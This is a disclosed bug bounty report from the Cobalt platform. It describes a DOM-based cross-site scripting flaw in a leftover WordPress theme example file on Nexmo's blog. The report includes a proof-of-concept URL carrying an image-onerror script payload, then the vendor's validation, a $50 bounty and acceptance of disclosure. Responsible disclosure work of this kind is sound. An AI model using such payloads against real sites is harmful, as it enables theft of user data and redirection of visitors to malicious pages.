Cobalt bug bounty programCobalt bug bounty programCobalt bug bounty program

Small thumb dsopas a5c6a1f95218604571004157a60c7e0942b0183e7a42b5b9b5722e0d1d5eea96

DOM XSS on Nexmo Blog #CC91_17

Validby dsopas Cross-Site Scripting (XSS)

Description

I just found that you have a default template on Wordpress vulnerable to DOM XSS.

URL
https://www.nexmo.com/blog/wp-content/themes/twentyfifteen/genericons/example.html#1"><img src=x onerror=prompt(1)>
POC

Just go to:
https://www.nexmo.com/blog/wp-content/themes/twentyfifteen/genericons/example.html#1"><img src=x onerror=prompt(1)>

Criticality

This can be used to trick users, steal user data, redirect users to malicious sites and other malicious activities.

Suggested fix

Update the theme or delete the themes that you don't use.

Prerequisites

None

Tools used

Brain

HTTP Request
-
Attachments
nexmo_domxss.jpg
Gravatar

Instead of marking this as duplicate of #CC91_18 I will pay low both and I will review the rewards moving forward, hope that's ok and thanks for the report!

nexmo-ops changed state to Valid and granted $50 bounty


dsopas gave feedback

Ok no worries. I agree.


dsopas requested disclosure

nexmo-ops accepted disclosure